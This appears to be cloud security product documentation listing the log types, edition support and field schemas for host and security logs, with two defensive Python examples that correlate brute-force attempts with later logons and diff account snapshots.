
Simple Log Service: Log Categories and Fields

Last Updated: Jun 04, 2026

Security Center log analysis centralizes host activity and security event data for auditing, incident tracing, and threat detection. This topic covers supported log types, edition-specific availability, log fields, and collection cycles.

Version support

The available log types depend on your Security Center edition or protection level.

Subscription

Host logs

| Log Type | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
| --- | --- | --- | --- | --- | --- |
| Logon Flow Logs | Unsupported | Supported | Supported | Supported | Supported |
| Network Connection Logs | Unsupported | Supported | Supported | Supported | Supported |
| Process Startup Logs | Unsupported | Supported | Supported | Supported | Supported |
| Brute-force Attack Logs | Unsupported | Supported | Supported | Supported | Supported |
| DNS Request Logs | Unsupported | Supported | Supported | Supported | Supported |
| Client Event Logs | Supported | Supported | Supported | Supported | Supported |
| Account Snapshot Logs | Unsupported | Unsupported | Unsupported | Supported | Supported |
| Network Snapshot Logs | Unsupported | Unsupported | Unsupported | Supported | Supported |
| Process Snapshot Logs | Unsupported | Unsupported | Unsupported | Supported | Supported |

Security logs

| Log Type | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
| --- | --- | --- | --- | --- | --- |
| Security Alert Logs | Supported. Note: Records only alerts supported by the Basic edition. | Supported | Supported | Supported | Supported |
| Vulnerability Logs | Supported. Note: Records only vulnerabilities supported by the Basic edition. | Supported | Supported | Supported | Supported |
| Network Defense Logs | Unsupported | Supported | Supported | Supported | Supported |
| Core File Monitoring Event Logs | Unsupported | Unsupported | Unsupported | Supported | Supported |
| CSPM - Baseline Check Logs | Unsupported | Unsupported | Supported | Supported | Supported |

Value-added service logs

If you enable any of the following value-added services, Security Center analyzes the logs they generate:

  • Malicious File Detection

  • Agentless Detection

  • Application Protection

  • CSPM - Baseline Check and Cloud Service Configuration Risk

Pay-as-you-go

If you purchase the Host and Container Security pay-as-you-go service, the available log types vary by the protection level assigned to each server.

Host Logs

| Log Type | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
| --- | --- | --- | --- | --- |
| Logon Flow Logs | Unsupported | Supported | Supported | Supported |
| Network Connection Logs | Unsupported | Supported | Supported | Supported |
| Process Startup Logs | Unsupported | Supported | Supported | Supported |
| Brute-force Attack Logs | Unsupported | Supported | Supported | Supported |
| DNS Request Logs | Unsupported | Supported | Supported | Supported |
| Client Event Logs | Supported | Supported | Supported | Supported |
| Account Snapshot Logs | Unsupported | Unsupported | Supported | Supported |
| Network Snapshot Logs | Unsupported | Unsupported | Supported | Supported |
| Process Snapshot Logs | Unsupported | Unsupported | Supported | Supported |

Security Logs

| Log Type | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
| --- | --- | --- | --- | --- |
| Security Alert Logs | Supported. Note: Records only alerts supported by the Unprotected level. | Supported | Supported | Supported |
| Vulnerability Logs | Supported. Note: Records only vulnerabilities supported by the Unprotected level. | Supported | Supported | Supported |
| Network Defense Logs | Unsupported | Supported | Supported | Supported |
| Core File Monitoring Event Logs | Unsupported | Unsupported | Supported | Supported |

Pay-as-you-go Service Logs

If you enable any of the following pay-as-you-go services, Security Center analyzes the logs they generate:

  • Malicious File Detection

  • Agentless Detection

  • Application Protection

  • CSPM - Baseline Check

Log type overview

Note

Log samples and field descriptions are for reference only. Fields may change with product updates. The actual data in SLS reflects the most current schema.

Host logs

Logon flow logs

  • __topic__: aegis-log-login

  • Log content: Records server logon events, including source IP, username, and result.

  • Feature description: Monitor user activity and detect anomalous behavior.

    Important

    Security Center does not collect logon flow logs for servers running Windows Server 2008.

  • Collection cycle: Real-time.

Network connection logs

  • __topic__: aegis-log-network

  • Log content: Records real-time network connections on servers, including 5-tuples and associated processes.

  • Feature description: Identify anomalous connection patterns, detect network attacks, and optimize performance.

    Note

    The agent collects only a subset of connection states between establishment and termination. Inbound traffic is not recorded.

  • Collection cycle: Real-time.

Process startup logs

  • __topic__: aegis-log-process

  • Log content: Records startup events for all new processes, including process name, command-line arguments, and parent process.

  • Feature description: Track process startups, detect abnormal behavior, and identify malware intrusions.

  • Collection cycle: Real-time. Logs are reported immediately upon process startup.

Brute-force attack logs

  • __topic__: aegis-log-crack

  • Log content: Records brute-force attack attempts against systems, applications, and accounts.

  • Feature description: Identify brute-force attacks, detect abnormal logons, weak passwords, and credential leaks, and support incident response and forensic analysis.

  • Collection cycle: Real-time.

Account snapshot logs

  • __topic__: aegis-snapshot-host

  • Log content: Records user account details including username, password policy, and logon history.

  • Feature description:

    Important

    Compare snapshots over time to monitor account changes and detect unauthorized access and account status anomalies.

  • Collection cycle: Automatic, based on the asset fingerprint interval (default: once daily). Manual collection is also supported.

Network snapshot logs

  • __topic__: aegis-snapshot-port

  • Log content: Records network connections including 5-tuples, status, and associated processes.

  • Feature description: Identify active connections, anomalous patterns, and potential network attacks.

  • Collection cycle: Automatic, based on the asset fingerprint interval (default: once daily). Manual collection is also supported.

Process snapshot logs

  • __topic__: aegis-snapshot-process

  • Log content: Records process activity including process IDs, names, and startup times.

  • Feature description: Monitor process activity and resource consumption; detect abnormal processes, excessive CPU usage, and memory leaks.

  • Collection cycle: Automatic, based on the asset fingerprint interval (default: once daily). Manual collection is also supported.

DNS request logs

  • __topic__: aegis-log-dns-query

  • Log content: Records DNS queries initiated by the server, including domain names, query types, and sources.

  • Feature description: Analyze DNS activity and detect anomalous queries, domain hijacking, or poisoning.

    Important

    Log collection is not supported for Linux servers with a kernel version earlier than 4.x.x.

  • Collection cycle: Real-time.

Client event logs

  • __topic__: aegis-log-client

  • Log content: Records Security Center client online/offline events.

  • Feature description: Monitor client availability.

  • Collection cycle: Real-time.

Security logs

Important

All security logs are collected in real time.

Vulnerability logs

  • __topic__: sas-vul-log

  • Log content: Records discovered vulnerabilities, including names, statuses, and handling actions.

  • Feature description: Track vulnerabilities, assess security risks, and prioritize remediation.

CSPM - Baseline check logs

  • __topic__: sas-hc-log

  • Log content: Records baseline check results including levels, categories, and risk levels.

  • Feature description: Assess baseline security posture and identify configuration risks.

    Note

    Only check items that fail for the first time are recorded, along with items that previously passed but fail upon re-inspection.

Security alert logs

  • __topic__: sas-security-log

  • Log content: Records security alerts including data sources, details, and severity levels.

  • Feature description: Understand security threats and respond promptly.

CSPM - Cloud platform configuration check logs

  • __topic__: sas-cspm-log

  • Log content: Records cloud platform configuration check results and whitelisting operations.

  • Feature description: Identify configuration issues and security risks in the cloud platform.

Network defense logs

  • __topic__: sas-net-block

  • Log content: Records network attack events, including attack types and source and destination IP addresses.

  • Feature description: Detect network attacks, respond to threats, and improve network security.

Application protection logs

  • __topic__: sas-rasp-log

  • Log content: Records RASP attack alerts, including attack types, behavioral data, and attacker IPs.

  • Feature description: Detect application-layer attacks and improve runtime security.

Malicious file detection logs

  • __topic__: sas-filedetect-log

  • Log content: Records malicious file detection results, including file information, detection scenarios, and results.

  • Feature description: Identify malicious programs in offline files or cloud storage for timely handling.

Core file monitoring event logs

  • __topic__: aegis-file-protect-log

  • Log content: Records core file monitoring alerts, including file paths, operation types, and alert levels.

  • Feature description: Detect theft or tampering of core files.

Agentless detection logs

  • __topic__: sas-agentless-log

  • Log content: Records security risks in cloud servers, disk snapshots, and images, including vulnerabilities, baseline checks, malicious samples, and sensitive files.

  • Feature description: View asset security risks across time periods and identify potential threats.

Host log fields

Logon flow logs

| Field | Description | Example |
| --- | --- | --- |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| sas_group_name | The asset group of the server in Security Center. | default |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| src_ip | The source IP address used to log on to the server. | 221.11.XX.XX |
| dst_port | The port used for the logon. | 22 |
| login_type | The logon type. Values include but are not limited to: SSHLOGIN (SSH); RDPLOGIN (Remote Desktop); IPCLOGIN (IPC connection). | SSH |
| username | The username used for the logon. | admin |
| login_count | The number of logons. Repeated logons within 1 minute are merged into a single entry. For example, a login_count of 3 indicates 3 logons occurred within the last minute. | 3 |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |
| auth_type | Authentication type, string type. Values: 1 (password authentication); 2 (key-based authentication). | 1 |
| success | Indicates whether the logon was successful. Values: true (successful); false (failed). | true |
| pid | The PID of the authentication process. | 12345 |
| src_port | The source port number of the logon, string type. | 43006 |
| ssh_fingerprint | The SSH key fingerprint used for logon, string type. When key-based authentication is used, this field records the corresponding key fingerprint. When password-based authentication is used, this field is empty. | SHA256:xxxxxxxxxxxx |

Network connection logs

| Field | Description | Example |
| --- | --- | --- |
| cmd_chain | The process chain. | [ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
| cmd_chain_index | The process chain index. Use this index to look up the corresponding process chain. | B184 |
| container_hostname | The hostname within the container. | nginx-ingress-controller-765f67fd4d-**** |
| container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
| container_image_id | The container image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
| container_image_name | The container image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
| container_name | The container name. | nginx-ingress-**** |
| container_pid | The process ID within the container. | 0 |
| net_connect_dir | The network connection direction. Values: in (inbound); out (outbound). | in |
| dst_ip | The IP address of the connection receiver. If net_connect_dir is out, this is the peer host. If in, this is the local host. | 192.168.XX.XX |
| dst_port | The port of the connection receiver. | 443 |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| parent_proc_name | The filename of the parent process. | /usr/bin/bash |
| pid | The process ID. | 14275 |
| ppid | The parent process ID. | 14268 |
| proc_name | The process name. | nginx |
| proc_path | The process path. | /usr/local/nginx/sbin/nginx |
| proc_start_time | The process startup time. | N/A |
| connection_type | The protocol. Values: tcp; raw (raw socket). | tcp |
| sas_group_name | The asset group of the server in Security Center. | default |
| src_ip | The source IP address. | 100.127.XX.XX |
| src_port | The source port. | 41897 |
| srv_comm | The command name associated with the grandparent process. | containerd-shim |
| status | The network connection status. Values: 1 (Closed); 2 (Listening); 3 (SYN sent); 4 (SYN received); 5 (Established); 6 (Close wait); 7 (Closing); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB deleted). | 5 |
| type | The type of real-time network connection. Values: connect (active TCP connection initiated); accept (TCP connection received); listen (port is listening). | listen |
| uid | The ID of the process user. | 101 |
| username | The username of the process. | root |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Process startup logs

| Field | Description | Example |
| --- | --- | --- |
| cmd_chain | The process chain. | [ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
| cmd_chain_index | The process chain index. Use this index to look up the corresponding process chain. | B184 |
| cmd_index | The index of each parameter in the command line. Each pair of values marks the start and end position of a parameter. | 0,3,5,8 |
| cmdline | The full command line used to start the process. | ipset list KUBE-6-CLUSTER-IP |
| comm | The command name associated with the process. | N/A |
| container_hostname | The hostname within the container. | nginx-ingress-controller-765f67fd4d-**** |
| container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
| container_image_id | The container image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
| container_image_name | The container image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
| container_name | The container name. | nginx-ingress-**** |
| container_pid | The process ID within the container. | 0 |
| cwd | The working directory of the process. | N/A |
| proc_name | The process filename. | ipset |
| proc_path | The full path of the process file. | /usr/sbin/ipset |
| gid | The process group ID. | 0 |
| groupname | The user group name. | group1 |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
| parent_proc_name | The filename of the parent process. | kube-proxy |
| parent_proc_path | The full path of the parent process file. | /usr/local/bin/kube-proxy |
| pid | The process ID. | 14275 |
| ppid | The parent process ID. | 14268 |
| proc_start_time | The process startup time. | 2024-08-01 16:45:40 |
| parent_proc_start_time | The startup time of the parent process. | 2024-07-12 19:45:19 |
| sas_group_name | The asset group of the server in Security Center. | default |
| srv_cmd | The command line of the grandparent process. | /usr/bin/containerd |
| tty | The logon terminal. N/A indicates the account has never logged on to a terminal. | N/A |
| uid | The user ID. | 123 |
| username | The username of the process. | root |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Brute-force attack logs

| Field | Description | Example |
| --- | --- | --- |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server under brute-force attack. | 192.168.XX.XX |
| sas_group_name | The asset group of the server in Security Center. | default |
| uuid | The UUID of the server under brute-force attack. | 5d83b26b-b7ca-4a0a-9267-12***** |
| login_count | The number of failed logon attempts. Repeated attempts within 1 minute are merged into a single entry. For example, a login_count of 3 indicates 3 attempts within the last minute. | 3 |
| src_ip | The source IP address of the logon attempt. | 47.92.XX.XX |
| dst_port | The logon port. | 22 |
| login_type | The logon type. Values: SSHLOGIN (SSH logon); RDPLOGIN (Remote Desktop logon); IPCLOGIN (IPC connection logon); SQLSERVER (SQL Server logon failure). | SSH |
| username | The logon username. | user |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |
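The logon flow and brute-force field tables above share uuid, src_ip and start_time, which is enough to correlate the two topics. The following is an added example, not code from Security Center or this documentation: it flags a successful aegis-log-login record that follows aegis-log-crack failures from the same source against the same server, summing login_count because each record merges up to a minute of attempts. The sample records, the 600-second window, the threshold of 10 and the assumption that every value arrives as a string are choices made for this example.

```python
from collections import defaultdict

T0 = 1719472200  # constructed base timestamp, in seconds like start_time


def _rec(topic, uuid, src_ip, offset, **fields):
    """Build one constructed record; every value is kept as a string (assumption)."""
    base = {"__topic__": topic, "uuid": uuid, "src_ip": src_ip, "username": "root",
            "login_type": "SSHLOGIN", "dst_port": "22", "start_time": str(T0 + offset)}
    base.update(fields)
    return base


# Constructed sample data: field names and __topic__ values come from the
# tables above, the hosts, addresses and counts are made up.
SAMPLE_LOGS = [
    # 14 + 9 failed attempts against host-a, merged into one record per minute.
    _rec("aegis-log-crack", "host-a", "203.0.113.7", 0, login_count="14"),
    _rec("aegis-log-crack", "host-a", "203.0.113.7", 60, login_count="9"),
    # A failed logon record is not a compromise signal on its own.
    _rec("aegis-log-login", "host-a", "203.0.113.7", 90, success="false", auth_type="1"),
    # Password logon from the same source two minutes in: should be flagged.
    _rec("aegis-log-login", "host-a", "203.0.113.7", 120, success="true", auth_type="1"),
    # Same source and host, long after the window has passed.
    _rec("aegis-log-login", "host-a", "203.0.113.7", 5000, success="true", auth_type="1"),
    # Same source, different server that saw no failures.
    _rec("aegis-log-login", "host-b", "203.0.113.7", 120, success="true", auth_type="1"),
    # Three failures, then a key-based logon: below the default threshold.
    _rec("aegis-log-crack", "host-a", "198.51.100.20", 0, login_count="3"),
    _rec("aegis-log-login", "host-a", "198.51.100.20", 30, success="true",
         auth_type="2", ssh_fingerprint="SHA256:constructed"),
]


def find_logons_after_bruteforce(records, window_seconds=600, min_failures=10):
    """Return successful logons preceded by enough failures from the same src_ip."""
    failures = defaultdict(list)  # (uuid, src_ip) -> [(start_time, login_count)]
    logons = []
    for rec in records:
        topic = rec.get("__topic__")
        if topic == "aegis-log-crack":
            # login_count already aggregates a minute of attempts, so weight by it.
            failures[(rec["uuid"], rec["src_ip"])].append(
                (int(rec["start_time"]), int(rec.get("login_count") or 1)))
        elif topic == "aegis-log-login" and rec.get("success") == "true":
            logons.append(rec)

    findings = []
    for rec in sorted(logons, key=lambda r: int(r["start_time"])):
        when = int(rec["start_time"])
        attempts = sum(count
                       for ts, count in failures.get((rec["uuid"], rec["src_ip"]), ())
                       if when - window_seconds <= ts <= when)
        if attempts < min_failures:
            continue
        findings.append({
            "uuid": rec["uuid"],
            "src_ip": rec["src_ip"],
            "username": rec["username"],
            "logon_time": when,
            "failed_attempts": attempts,
            # auth_type 1 is password authentication: a guessed password is the
            # likely explanation. Key-based logons (2) are left for review.
            "severity": "high" if rec.get("auth_type") == "1" else "review",
        })
    return findings


if __name__ == "__main__":
    for finding in find_logons_after_bruteforce(SAMPLE_LOGS):
        print(finding)
```
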

Account snapshot logs

| Field | Description | Example |
| --- | --- | --- |
| account_expire | The account expiration date. The value never means the account never expires. | never |
| domain | The domain or directory service the account belongs to. N/A means the account does not belong to any domain. | N/A |
| groups | The groups the account belongs to. N/A means the account does not belong to any group. | ["nscd"] |
| home_dir | The home directory, the default location for storing and managing files in the system. | /Users/abc |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| last_chg | The date the password was last changed. | 2022-11-29 |
| last_logon | The date and time of the last logon. N/A means the account has never been used to log on. | 2023-08-18 09:21:21 |
| login_ip | The remote IP address of the last logon. N/A means the account has never been used to log on. | 192.168.XX.XX |
| passwd_expire | The password expiration date. The value never means the password never expires. | 2024-08-24 |
| perm | Whether the account has root permissions. Values: 0 (no root permissions); 1 (has root permissions). | 0 |
| sas_group_name | The asset group of the server in Security Center. | default |
| shell | The Linux shell. | /sbin/nologin |
| status | The user account status. Values: 0 (logon prohibited); 1 (logon permitted). | 0 |
| tty | The logon terminal. N/A means the account has never logged on to a terminal. | N/A |
| username | The username. | nscd |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| warn_time | The password expiration reminder date. The value never means no reminder is set. | 2024-08-20 |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |
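The account snapshot overview recommends comparing snapshots over time to spot account changes. The following is an added example, not code from Security Center or this documentation: it diffs two aegis-snapshot-host collections keyed by (uuid, username) and rates a gain of root permissions (perm 0 to 1) or newly permitted logon (status 0 to 1) as high risk. The sample accounts, the set of watched fields and the risk labels are assumptions made for this example.

```python
import json

# Fields from the account snapshot table whose change is worth reporting.
WATCHED_FIELDS = ("perm", "status", "shell", "groups", "last_chg")


def _groups(value):
    """Parse the groups field (a JSON list such as ["nscd"], or N/A) into a set."""
    try:
        parsed = json.loads(value)
    except (TypeError, ValueError):
        return frozenset()
    return frozenset(parsed) if isinstance(parsed, list) else frozenset()


def _normalise(record):
    """Keep only the watched fields, with groups made order-insensitive."""
    view = {field: record.get(field, "") for field in WATCHED_FIELDS}
    view["groups"] = _groups(record.get("groups"))
    return view


def diff_account_snapshots(previous, current):
    """Compare two snapshot collections and return a list of rated changes."""
    old = {(r["uuid"], r["username"]): _normalise(r) for r in previous}
    new = {(r["uuid"], r["username"]): _normalise(r) for r in current}
    changes = []
    for key in sorted(new.keys() - old.keys()):
        # A brand-new account that already has root permissions is the worst case.
        risk = "high" if new[key]["perm"] == "1" else "medium"
        changes.append({"account": key, "change": "added", "risk": risk})
    for key in sorted(old.keys() - new.keys()):
        changes.append({"account": key, "change": "removed", "risk": "low"})
    for key in sorted(old.keys() & new.keys()):
        for field in WATCHED_FIELDS:
            before, after = old[key][field], new[key][field]
            if before == after:
                continue
            # perm 0 -> 1 grants root; status 0 -> 1 re-enables logon.
            escalation = field in ("perm", "status") and (before, after) == ("0", "1")
            changes.append({"account": key, "change": field, "before": before,
                            "after": after, "risk": "high" if escalation else "medium"})
    return changes


def _acct(username, perm, status, shell, groups, last_chg="2022-11-29"):
    """Build one constructed snapshot record; values are strings (assumption)."""
    return {"__topic__": "aegis-snapshot-host", "uuid": "host-a", "username": username,
            "perm": perm, "status": status, "shell": shell,
            "groups": json.dumps(groups), "last_chg": last_chg}


# Constructed snapshots from two consecutive daily collections.
PREVIOUS = [
    _acct("root", "1", "1", "/bin/bash", ["root"]),
    _acct("nscd", "0", "0", "/sbin/nologin", ["nscd"]),
    _acct("deploy", "0", "1", "/bin/bash", ["deploy"]),
]
CURRENT = [
    _acct("root", "1", "1", "/bin/bash", ["root"]),
    _acct("nscd", "0", "1", "/bin/bash", ["nscd"]),            # service account can now log on
    _acct("deploy", "1", "1", "/bin/bash", ["deploy", "wheel"]),  # gained root
    _acct("support", "1", "1", "/bin/bash", ["root"]),           # new privileged account
]

if __name__ == "__main__":
    for change in diff_account_snapshots(PREVIOUS, CURRENT):
        print(change)
```
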

Network snapshot logs

| Field | Description | Example |
| --- | --- | --- |
| net_connect_dir | The network connection direction. Values: in (inbound); out (outbound). Note: Because only logs with status 2 are delivered, net_connect_dir is always in. | in |
| dst_ip | The peer IP address, generally empty. Note: Because only logs with status 2 are delivered, dst_ip is always empty (the peer IP); src_ip is the local IP. | |
| dst_port | The port of the connection receiver. | 443 |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| pid | The process ID. | 682 |
| proc_name | The process name. | sshd |
| connection_type | The protocol. Values: tcp4 (TCP over IPv4); tcp6 (TCP over IPv6). | tcp4 |
| sas_group_name | The asset group of the server in Security Center. | default |
| src_ip | The local IP address. | 100.127.XX.XX |
| src_port | The listening port. | 41897 |
| status | The value is 2, indicating the port is listening; the associated src_ip/src_port is the listening address. Other statuses are not delivered. Remaining possible values (not currently delivered): 1 (Closed); 3 (SYN sent); 4 (SYN received); 5 (Established); 6 (Close wait); 7 (Closing); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB deleted). | 5 |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Process snapshot logs

| Field | Description | Example |
| --- | --- | --- |
| cmdline | The full command line used to start the process. | /usr/local/share/assist-daemon/assist_daemon |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| md5 | The MD5 hash of the binary file. Files larger than 1 MB are not calculated. | 1086e731640751c9802c19a7f53a64f5 |
| proc_name | The process filename. | assist_daemon |
| proc_path | The full path of the process file. | /usr/local/share/assist-daemon/assist_daemon |
| pid | The process ID. | 1692 |
| pname | The filename of the parent process. | systemd |
| sas_group_name | The asset group of the server in Security Center. | default |
| proc_start_time | The process startup time. Built-in field. | 2023-08-18 20:00:12 |
| uid | The process user ID. | 101 |
| username | The username of the process. | root |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

DNS request logs

| Field | Description | Example |
| --- | --- | --- |
| domain | The domain name corresponding to the DNS request. | example.aliyundoc.com |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| host_ip | The IP address of the server that initiated the DNS request. | 192.168.XX.XX |
| pid | The process ID that initiated the DNS request. | 3544 |
| ppid | The parent process ID that initiated the DNS request. | 3408 |
| cmd_chain | The process chain that initiated the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
| cmdline | The command line that initiated the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
| proc_path | The path of the process that initiated the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
| sas_group_name | The asset group of the server in Security Center. | default |
| time | The time the DNS request event was captured. This time generally matches the actual occurrence of the DNS request. | 2023-08-17 20:05:04 |
| uuid | The UUID of the server that initiated the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Client event logs

| Field | Description | Example |
| --- | --- | --- |
| uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
| host_ip | The IP address of the server. | 192.168.XX.XX |
| agent_version | The client version. | aegis_11_91 |
| last_login | The timestamp of the previous logon, in milliseconds. | 1716444387617 |
| platform | The operating system type. Values: windows; linux. | linux |
| region_id | The region ID where the server resides. | cn-beijing |
| status | The client status. Values: online; offline. | online |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Security log fields

Vulnerability logs

| Field | Description | Example |
| --- | --- | --- |
| vul_alias_name | The vulnerability alias. | CESA-2023:1335: openssl Security Update |
| risk_level | The risk level. Values: asap (High); later (Medium); nntf (Low). | later |
| extend_content | Extended vulnerability information in JSON format. | {"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...} |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| internet_ip | The public IP address of the asset. | 39.104.XX.XX |
| intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
| instance_name | The hostname. | hhht-linux-*** |
| vul_name | The vulnerability name. | centos:7:cesa-2023:1335 |
| operation | The action performed on the vulnerability. Values: new (New); verify (Verify); fix (Fix). | new |
| status | The vulnerability status. Values: 1 (Unfixed); 2 (Fix failed); 3 (Rollback failed); 4 (Fixing); 5 (Rolling back); 6 (Verifying); 7 (Fixed); 8 (Fixed, restart required); 9 (Rolled back); 10 (Ignored); 11 (Rolled back, restart required); 12 (Does not exist); 13 (Invalid). | 1 |
| tag | The vulnerability tag. Values: oval (Linux software vulnerability); system (Windows system vulnerability); app (application vulnerability). Tags for other vulnerability types are random strings. | oval |
| type | The vulnerability type. Values: sys (Windows system vulnerability); cve (Linux software vulnerability); emg (Urgent vulnerability). | sys |
| uuid | The UUID of the server. | ad66133a-dc82-4e5e-9659-a49e3**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

CSPM - Baseline check logs

| Field | Description | Example |
| --- | --- | --- |
| check_item_name | The name of the check item. | Set minimum interval for password changes |
| check_item_level | The severity level of the baseline check. Values: high (High); medium (Medium); low (Low). | medium |
| check_type | The type of the check item. | Identity authentication |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| risk_level | The risk level. Values: high (High); medium (Medium); low (Low). | medium |
| operation | The operation. Values: new (New); verity (Validation). | new |
| risk_name | The name of the risk item. | Password policy compliance check |
| sas_group_name | The asset group of the server in Security Center where the risk item was detected. | default |
| status | The status information. Two sets of status codes apply. Baseline check statuses: 1 (Failed); 2 (Verifying); 6 (Ignored); 7 (Fixing). Handling statuses: 1 (Unfixed); 2 (Fix failed); 3 (Rollback failed); 4 (Fixing); 5 (Rolling back); 6 (Verifying); 7 (Fixed); 8 (Fixed, restart required); 9 (Rolled back); 10 (Ignored); 11 (Rolled back, restart required); 12 (Does not exist); 13 (Invalid). | 1 |
| sub_type_alias_name | The alias of the subtype. | International security best practices - Ubuntu 16/18/20/22 security baseline check |
| sub_type_name | The baseline subtype name. For valid values, see the List of baseline types and subtypes. | hc_ubuntu16_cis_rules |
| type_alias_name | The alias of the type. | International security best practices |
| type_name | The baseline type. For valid values, see the List of baseline types and subtypes. | cis |
| uuid | The UUID of the server where the risk item was detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |

Security alert logs

| Field | Description | Example |
| --- | --- | --- |
| data_source | The data source. Values: aegis_suspicious_event (Host Anomaly); aegis_suspicious_file_v2 (Webshell); aegis_login_log (Anomalous Logon); honeypot (Cloud Honeypot Alert Event); object_scan (File Detection Anomaly); security_event (Security Center Anomaly); sas_ak_leak (AK Leak Event). | aegis_login_log |
| detail | A structured object (JSON) providing detailed alert context. Fields vary by alert type. Common values for the alert_reason field: reason1 (IP is not from a common logon location); reason2 (API call failed); reason3 (IP is not from a common logon location and API call failed). | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...} |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| internet_ip | The public IP address of the asset. | 39.104.XX.XX |
| intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
| level | The risk level of the alert event. Values: serious (Urgent); suspicious (Suspicious); remind (Reminder). | suspicious |
| name | The alert name. | Anomalous Logon - ECS Unusual Account Logon |
| operation | The operation. Values: new (New); dealing (Processing); update (Updated). | new |
| status | The alert status. Values: 1 (Unhandled, default for new alerts); 2 (Ignored, after executing the Ignore action); 8 (Whitelisted, after adding to whitelist); 16 (Processing, during end-process/isolate-file/whitelist actions); 32 (Processed, after manual handling or completing end-process/isolate-file actions); 64 (Expired, if no action is taken within 30 days); 513 (Auto-blocked, the alert has been automatically blocked by the precise defense feature of Security Center and does not require manual handling). | 1 |
| unique_info | The unique identifier of the alert. | 2536dd765f804916a1fa3b9516b5**** |
| uuid | The UUID of the server where the alert was generated. | ad66133a-dc82-4e5e-9659-a49e3**** |
| start_time | The start timestamp, in seconds. Also used to indicate the time when the event occurred. | 1719472214 |
| suspicious_event_id | The alert event ID. | 650226318 |
| handle_time | The timestamp corresponding to the operation. | 1765272845 |
| alert_first_time | The timestamp when the alert first appeared. | 1764226915 |
| alert_last_time | The timestamp when the alert last appeared. | 1765273425 |
| strict_mode | Indicates whether the alert is in strict mode. Values: true; false. | true |
| user_id | The account ID. | 1358******3357 |

CSPM - Cloud platform configuration check logs

| Field | Description | Example |
| --- | --- | --- |
| check_id | The check item ID. You can obtain this ID by calling the ListCheckResult operation. | 11 |
| check_item_name | The name of the check item. | Origin fetch configuration |
| instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
| instance_name | The instance name. | lsm |
| instance_result | The impact of the risk, as a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]} |
